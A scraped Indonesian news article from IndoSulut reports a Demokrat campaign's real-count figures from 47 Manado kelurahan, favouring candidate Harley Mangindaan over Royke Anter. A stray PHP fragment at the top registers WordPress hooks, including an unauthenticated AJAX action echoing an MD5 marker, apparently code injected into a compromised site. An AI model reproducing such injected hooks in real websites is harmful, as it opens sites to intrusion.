function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Data Real Count 47 Kelurahan Masuk, Bang Ai Unggul Jauh atas Royke Anter – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

MANADO · 16 Feb 2024 01:06 WIB ·

Data Real Count 47 Kelurahan Masuk, Bang Ai Unggul Jauh atas Royke Anter


					Data Real Count 47 Kelurahan Masuk, Bang Ai Unggul Jauh atas Royke Anter Perbesar

MANADO – Harley Ai Mangindaan lakukan Real Count pada kelurahan di kota manado untuk dapatkan data pemilih partai Demokrat. Data yang di berikan kpd awak media, terlihat perolehan data C1 di 47 kelurahan sebanyak 349 TPS.

Data masuk RealCount 47 kelurahan dari 87 kelurahan di kota Manado hingga pukul 00.45 wita hari jumat.

Di dapati perbandingan antara Caleg Royke Anter dan Harley Mangindaan di dapati perolehan suara partai Demokrat yang sangat baik, di tunjang dari para caleg lain nya.

Perolehan caleg yg sama-sama bekerja di partai Demokrat membuat fenomena baru dalam peta politik Sulawesi utara.
Ketua Bapilu DPD Demokrat Sulawesi Utara, Dr Hilary Brigita Lasut yang juga sebagai Ketua Badan Saksi PD mengatakan, bang Ai memang sangat berpeluang duduk di kursi jatah Partai berlambang Mercy ini di susul Royke Anter bermain dengan pendukung para ketua ranting se kota manado membuat kontalasi sangat berwarna.

Perolehan perhitungan tepat (real count) di 47 kelurahan oleh HMC (Harley Mangindaan Centre) di dapati dari C1 Plano di semua TPS lingkup 47 kelurahan.

Jerich, koordinator HMC mengatakan, para saksi dan Satgas dari Caleg Harley Mangindaan, bekerja dengan baik menggalang pemilih loyalis Bang Ai. Tercatat bahwa Bang Ai, sangat Populer di komunitas kota manado di sebabkan pernah mengikuti 3 (tiga) periode pentas Pilwako.
Membuat Dr Harley Mangindaan sangat membumi. Kecamatan Tikala, Tikala Baru kelurahan Domisili Bang Ai meraup 1134 suara dan Royke 25 suara, begitu pun wilayah pelosok kelurahan Tongkaina meraup 92 suara dan 28 untuk Royke Anter, begitu pun kecamatan Mapanget, Bang Ai di pilih sebanyak 542 dan Royke Anter 6 suara, di kelurahan Kairagi 2.
Input Data terus bergerak, berharap dapil kota Manado mendapat 2(dua)kursi.

Artikel ini telah dibaca 309 kali

badge-check

Penulis

Baca Lainnya

Pemkot Manado Rolling Jabatan Kepsek dan Pengawas, Wawali Sualang: Tetap Fokus Bekerja

20 Maret 2024 - 15:30 WIB

Pemkot Manado Rolling Jabatan Pegawai Eselon III dan IV

5 Maret 2024 - 17:23 WIB

Dapil Sario – Malalayang Membara, Peluang Rebut 6 Kursi DPRD Manado

16 Februari 2024 - 12:51 WIB

Terkait Video Viral Pemindahan Kotak Suara ke Graha Gubernuran, Ini Kata KPU Manado

16 Februari 2024 - 11:31 WIB

Bawaslu Manado Diduga Kebablasan Awasi Kampanye Prabowo di Lapangan Koni

7 Februari 2024 - 22:13 WIB

Penyebar Postingan Potongan Anggaran Bimtek KPPS Sampaikan Permohonan Maaf untuk KPU Manado

2 Februari 2024 - 15:21 WIB

Trending di MANADO